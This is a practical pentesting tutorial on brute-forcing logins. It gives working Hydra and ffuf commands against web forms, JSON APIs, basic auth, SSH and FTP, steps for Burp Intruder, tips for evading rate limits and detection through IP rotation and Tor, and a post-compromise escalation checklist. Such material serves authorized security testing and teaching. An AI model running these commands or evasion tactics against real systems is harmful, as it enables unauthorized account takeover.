Brute force attacks target authentication systems by systematically trying multiple username–password combinations until access is gained. These attacks succeed when applications allow unlimited attempts, use weak passwords, leak information through error messages, or fail to enforce security controls such as rate limiting. Brute forcing is one of the most direct and practical methods used during pentesting to validate password strength and identify authentication weaknesses.
Understanding Brute Force Attacks
A brute force attack works by automating login attempts. Attackers try:
-
Every possible password
-
A large list of common passwords
-
Password variations based on known patterns
-
Combinations from breached credential sets
These attacks depend on speed, response analysis, and authentication flow weaknesses. A single weak password inside a system is often enough for full compromise.
Prerequisites for a Successful Brute Force Test
Before brute forcing, identify:
-
Login endpoint
-
Required parameters (username, password)
-
Request type (GET, POST, JSON, URL-encoded, multipart)
-
Error messages
-
Rate limiting or lockout controls
-
CSRF tokens or anti-automation mechanisms
Understanding the authentication flow allows accurate automation.
Identifying the Login Request Structure
Capture a sample login request using a proxy like Burp Suite.
Example POST request:
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
username=admin&password=1234
Extract parameters:
-
username
-
password
These values will be replaced with wordlists during brute forcing.
Brute Forcing with Hydra (Practical)
Hydra is the most widely used brute force tool.
Basic Login Form Brute Force
hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
Explanation:
-
-l admin: user to test -
-P rockyou.txt: password list -
/login: endpoint -
username=^USER^&password=^PASS^: injected fields -
Invalid: failure message
When Hydra finds a match, it displays the valid password.
Brute Force with Multiple Usernames
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
Used when you must test multiple accounts.
Brute Forcing Basic Auth
hydra -L users.txt -P passwords.txt -s 80 -f target.com http-get /
Brute Forcing SSH
hydra -L users.txt -P passwords.txt ssh://$IP
This targets exposed SSH services discovered during port scanning.
Brute Forcing FTP
hydra -L users.txt -P passwords.txt ftp://$IP
FTP is often vulnerable due to weak or default credentials.
Brute Forcing with Burp Suite Intruder (Practical)
Burp Intruder enables manual brute forcing with full control.
Step 1: Capture the login request
Send it to Intruder.
Step 2: Set Positions
Mark parameters:
-
username
-
password
Step 3: Add Payloads
Choose:
-
User list
-
Password list
Step 4: Configure Grep Match
Look for:
-
“Welcome”
-
“Dashboard”
-
“Redirect”
These responses indicate success.
Step 5: Launch Attack
Intruder sends thousands of requests, and you detect success based on differences in response codes, lengths, or messages.
Brute Forcing JSON Login Requests
For APIs using JSON authentication:
Example request:
POST /api/auth HTTP/1.1
Content-Type: application/json
{"user":"admin","pass":"1234"}
Hydra syntax:
hydra -l admin -P passwords.txt target.com http-post-form "/api/auth:{"user":"^USER^","pass":"^PASS^"}:Invalid"
Adjust based on actual structure.
Brute Forcing GraphQL Authentication
If GraphQL mutation is used:
mutation { login(user:"admin", password:"pass") }
You can brute force by injecting the password field repeatedly.
Identifying Successful Brute Force Indicators
Indicators include:
-
Response status changes
-
Redirects
-
Larger or smaller response length
-
Change in page title
-
Different error message
-
Missing “Invalid credentials” text
Automation tools highlight these differences.
Avoiding Detection During Brute Force
Applications often implement defenses. To evade them:
Slow down requests
hydra -t 1 -W 5 ...
Randomize User Agents
Use Burp Intruder or custom scripts to rotate headers.
Spread attempts across multiple IPs
This bypasses rate limits or IP blocks.
Use VPN or Tor (only when allowed by scope)
Distribute attempts to avoid triggering detection mechanisms.
Brute Force Against APIs
Modern applications use APIs for authentication.
Common endpoints:
-
/api/login -
/v1/auth -
/auth/token -
/session
Use ffuf or Burp Intruder to brute force:
ffuf -u http://target.com/api/login -d 'user=admin&pass=FUZZ' -w passwords.txt
Response filtering identifies valid credentials.
Common Brute Force Weaknesses in Applications
Brute force succeeds when the application:
-
Allows unlimited attempts
-
Does not lock accounts
-
Uses predictable error messages
-
Does not enforce rate limiting
-
Does not require MFA
-
Uses weak password policies
-
Stores plaintext passwords
-
Allows login with partial credentials
-
Leaks usernames through enumeration
These weaknesses are common across poorly designed authentication systems.
How Brute Force Leads to Exploitation
Once you brute force credentials, the attack escalates:
-
Login using discovered password
-
Check user role and privileges
-
Explore internal functionality
-
Attempt privilege escalation
-
Access sensitive data
-
Upload malicious files or scripts
-
Maintain persistence
-
Compromise other accounts
Authentication bypass leads directly to system takeover.
Intel Dump
-
Brute force attacks automate login attempts to bypass weak authentication.
-
Understanding request structure is essential before launching attacks.
-
Hydra, Burp Intruder, and ffuf perform practical brute forcing.
-
JSON, form-based, API, GraphQL, and basic auth flows can all be brute forced.
-
Indicators of success include response length, codes, and messages.
-
Brute force succeeds when the application lacks rate limiting or strong password enforcement.
-
Successful brute forcing enables full account takeover and further exploitation.